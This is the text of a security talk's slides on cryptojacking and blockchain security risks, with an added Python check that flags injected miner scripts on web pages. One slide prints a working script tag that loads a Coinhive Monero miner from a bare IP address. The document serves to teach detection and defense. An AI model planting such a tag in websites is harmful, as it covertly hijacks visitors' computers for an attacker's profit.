Evolution of a
Hack
CryptoJacking, CryptoCurrencies, and Blockchains
Preliminaries
▪ Bryan Becker, CISSP, CCSP
▪ More Futurist, less Crypto-Maximalist
▪ Terrified of CRISPR
▪ All opinions my own and not that of my
employer.
▪ DISCLAIMER: Bad Words!
▪ I Promise.
▪ Slap me if I talk about bitcoin price.
▪ None of this should be considered financial
advice.
Agenda
▪ CryptoJacking and newer, rebranded attacks against companies with efforts to
exploit resources using blockchain public chains and technologies.
▪ Are we ready for an “Internet of Literal Things Encapsulated in Tokens” revolution
from a security perspective?
Top 5 Uses of Public Blockchain Tokens!
▪ GIVEAWAY
▪ #5 – Useless Ethereum Token (UET)
▪ FAQ: “Wait … is this a joke? Is it a scam? Neither! This is real — and it’s 100%
transparent. You’re literally giving your money to someone on the internet and getting
completely useless tokens in return.”
▪ #4 -- SpankChain
▪ #3 -- PotCoin
▪ #2 – C**kBlockChain
▪ #1 -- F*ckToken -- $0.00005.
What is Blockchain anyways?
Blockchain Fundamentals
▪ Distributed Ledger
▪ Consensus by Code
▪ Digital Scarcity
▪ Programmability (Smart Contracts)
Blockchain Fundamentals - “What is a Wallet”
▪ AN INTERFACE WHICH INTERACTS WITH A BLOCKCHAIN.
▪ It doesn’t store money, it stores and interacts with private keys.
▪ It’s not a “place”, it’s an interface to pub/private key pairs to handle crypto assets.
▪ It can be…
▪ As simple as a piece of paper
▪ A fat client
▪ Mobile App
▪ Browser Extension
▪ Hardware token
How Proof of Work Consensus Works
▪ Transactions get broadcast to a
node
▪ Node adds transaction to a block
(small file of transactions)
▪ All other validators do math during
the blocktime.
▪ One validator wins the block
discovery, adds the block to the
chain, and “wins” the lottery for
freshly minted tokens as the security
incentive for “Proof of Work”
How Monero Works
CryptoJacking History
▪ Bitcoin browser-based mining: A thing since 2011.
▪ No ASICS
▪ Bitcoin was cheap and mining was profitable (don’t slap me!)
▪ Bitcoinplus.com
▪ Mostly disappeared with the onset of new technology.
▪ The more things change, the more they stay the same…
Current Risk: CryptoJacking
▪ CryptoJacking a.k.a. Harvest of distributed computing resources (CPU, Memory, Disk,
Bandwidth) for financial gain of attacker.
▪ With the coin mining gold rush, cryptojacking attacks skyrocketed 8,500 percent
▪ DRUPALGEDDON 2: 400 Drupal Websites hit using latest vuln.
▪ Shopify Plugin creates 5 iFrames which mine Monero.
▪ Showtime, UFC.TV.
▪ Weatherfor.us plugin for websites injects mining scripts.
▪ Fileless malware Ghostminer kills other cryptojacking competitors and mines in
memory and is nearly undetectable.
▪ CoinHive == CryptoJacking as a Service (CJaaS?)
It’s Literally This Easy (Invisible Browser Mining)
<script type='text/javascript' src='http://174.138.43.214/wp-content/plugins/simple-monero-miner-coin-hive/js/smmch-mine.js?v=1.4&#038;ver=4.9.5'></script>
Open source rig: https://github.com/xmrig/xmrig
Detection and Prevention
▪ Mostly detected at the network level (now)
▪ Resource Utilization and Monitoring
▪ Browser Level Detections via Software or Extensions (NoCoin, MinerBlock)
▪ Injection detection.
▪ No-Script
▪ IDS/IPS rules for DNS calls (DNS sinkholes)
▪ Anomaly Detection for Network Baseline monitoring
▪ BUILT-IN BROWSER restrictions
▪ NUCLEAR OPTION: Disable JavaScript
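The "Injection detection" bullet above, as an added example that is not part of the original slides: a Python check that parses a served page and flags script tags like the one on the "It's Literally This Easy" slide. The allowlist, the keyword pattern, the function names and cdn.example.com are assumptions; the sample page is constructed around the tag from the slide.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed keyword pattern, built from names that appear on these slides.
MINER_HINTS = re.compile(r"coin-?hive|monero|miner|xmrig", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_scripts(html, allowed_hosts):
    """Return (src, reasons) for each external script that looks injected."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = parts.hostname or ""  # empty for same-origin relative paths
        reasons = []
        if host and host not in allowed_hosts:
            reasons.append("host not in allowlist")
        if host and is_ip_literal(host):
            reasons.append("loaded from bare IP address")
        if parts.scheme == "http":
            reasons.append("loaded over plain HTTP")
        if MINER_HINTS.search(host + parts.path):
            reasons.append("miner-related name in URL")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: a first-party script, an allowlisted CDN script,
# and the injected tag shown on the slide.
SAMPLE_PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib/jquery.min.js"></script>
<script type='text/javascript' src='http://174.138.43.214/wp-content/plugins/simple-monero-miner-coin-hive/js/smmch-mine.js?v=1.4&#038;ver=4.9.5'></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src, reasons in audit_scripts(SAMPLE_PAGE, {"cdn.example.com"}):
        print(src)
        for reason in reasons:
            print("  -", reason)
```

Run against pages as they are actually served (after plugins and templates render), since injected tags of this kind do not appear in the site's source repository.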
CryptoJacking and Security: Evolution of a Hack
DEMO!!!!
▪ DEMO WORLD, PARTY TIME, EXCELLENT!
CryptoJacking
Future/Potential
▪ Why the resurgence?
▪ Privacy Based Coins
▪ Ease of Deployment
▪ Hard to find if throttled
▪ Mobile explosion
▪ Fundamental Profitability Problem
▪ CoinHive maxed out at 13.5 MH/s == ~5% of the Monero Hash Pool.
[Chart: Month by Month percentage change in Browser-based Mining. (Symantec)]
Future Forms of
CryptoJacking
▪ The Future of Monetization
▪ Evolution of current attacks
▪ WannaMine worm (ETERNALBLUE)
▪ GhostMiner
▪ GPU, File Storage
▪ IoT-focused CryptoJacking
▪ RadiFlow ICS Mining
▪ NEW TARGETS
▪ Fogs
▪ Kubernetes Clusters
CryptoJacking for Charity!
▪ UNICEF
▪ www.thehopepage.org
https://www.nvidia.com/object/what-is-gpu-computing.html
Part 2
Evolution of a Hack → Tokenized “Asset-ful” Data Structures
Security with Tokenized “Asset-ful” Data
Structures
▪ “I recall hearing in recent years, if you were a “startup” until you reached a
certain revenue threshold, security should not be a major concern or spend
area.” – Director-level Consultant in Boulder.
▪ You cannot mess up something decentralized in a fundamental way;
anything less than absolute correctness is absolute failure. — Charles
Noyes
The Internet of Money
▪ Web 3.0!
▪ Tokenize ALL THE THINGS!
▪ Make the world more liquid!
▪ Assets on the blockchain!
▪ Eliminate the middle man with smart
contracts!
▪ EVERYTHING on the Blockchain!
▪ Health Records, Identity, Supply
Chains, Security Tokens, Real Assets
What a time to be alive!
▪ “We rarely see people talking about what will form the main usage of Blockchain:
Robots and Machines.
This isn't going to be about whether grandpa or grandma, mommy or daddy are
gonna want to use Blockchain or not.
We are talking about the billion of interconnected devices which, for the first time
in technological history, will be able to transact value from device to device, in a
safe, fast and trustable manner.”
▪ In the near-future, the Internet of Things will move money and assets
autonomously or as directed by a DAO or AI.
Adoption: Blockchain news from the past 4
weeks days.
▪ “In the future, owning an asset and not having it tokenized on the blockchain will
be the equivalent of owning a company and not being on the Internet today.”
– Crypto Hedge Funder
▪ Bloomberg and Galaxy Digital just announced they're launching a
cryptocurrency index to track 10 of the most liquid crypto assets.
▪ China's Ministry of Public Security is planning to use blockchain technology to
drastically improve their handling of evidence from police investigations.
▪ Facebook is launching an internal team to exclusively focus on blockchain tech.
The team is led by David Marcus, former PayPal President & current Coinbase
board member
Adoption: Blockchain news from the past 4
weeks days.
▪ Oracle, the fourth largest software company in the world according to Forbes, is
launching their blockchain products this month.
▪ Consensys and Saudi Arabia’s Ministry of Communications and Information
Technology recently held a blockchain bootcamp to teach the skills necessary for
this new world.
▪ JPMorgan filed a patent to use blockchain for Bank-to-Bank transactions.
▪ Goldman Sachs is opening a Bitcoin trading operation.
▪ The South Korean Central Bank is planning to use cryptocurrencies to achieve
a truly cashless society by 2020
Wall Street Journal: Paul Vizla
Wait, WHAT?!??! WHAT ARE WE THINKING
▪ Coinbase Bug Allowed Users to Give
Themselves Unlimited Ether - Gizmodo
▪ Founders of a cryptocurrency backed by
Floyd Mayweather charged with fraud by
SEC - CNBC
Wait, WHAT?!??! WHAT ARE WE THINKING
• Malware which monitors clipboards.
• Smart Contract coding vulnerabilities (PARITY)
Blockchains and Government
▪ Governments which recognize Smart Contracts as law
▪ Tennessee
▪ Arizona
▪ Florida
▪ More to come
Some Inconvenient Truths
▪ Most dApps don’t even need a blockchain.
▪ Users can’t even handle a password, now you want them to handle a wallet and a private key?
▪ CONFIDENTIALITY BROKEN.
▪ Smart Contracts are still written by humans.
▪ Criminals flock to where the low hanging fruit is.
Some Inconvenient Truths
▪ Validator nodes are still servers run by someone.
▪ Internal blockchains’ validator nodes are still servers handled by humans.
▪ INTEGRITY BROKEN.
▪ PARADIGM CHALLENGE
▪ “Move fast and break things” for systems with tokenized assets is not an effective
development strategy.
▪ Check ourselves before we wreck ourselves.
▪ Governance, governance, governance.
The Power of Programmers:
A New Ethics Dilemma
▪ Security Token explosion coming.
▪ Assets, such as houses, supply chains, physical money, gold bullion.
▪ Programmers writing protocols which:
▪ Store assets.
▪ Move assets
▪ Use smart contracts to hold assets in “virtual escrow”
▪ These protocols will be the foundation of mutual funds, asset portfolios,
money transfers, holding institutions, and the like.
Recommendations for our Industry
▪ NIST guidance paper(s) and Blockchain Security Framework.
▪ Overall guidelines on the tech and deployment.
▪ Internal Governance.
▪ GLB-like law for FinTech with Blockchains.
▪ Privacy Law Update. Blockchain Won’t Make it Better.
▪ Makes Law Enforcement that much harder.
▪ Massive Education Investments needed.
Recommendations for our Industry
▪ Reuse the Good Code!
▪ Opensource Shared User Models and pre-Deployed Contract Modules.
▪ KNOW YOUR RISK: Flipping the Development Paradigm on its head.
▪ Move slow so no one loses their house. Security First!
▪ Develop more smart contract auditors.
▪ Inning 2. Know Risks, Continue to Improve.
<FIN>
▪ Questions and Answers.
▪ QR me :)
▪ Bryan Becker
▪ @_beckerb
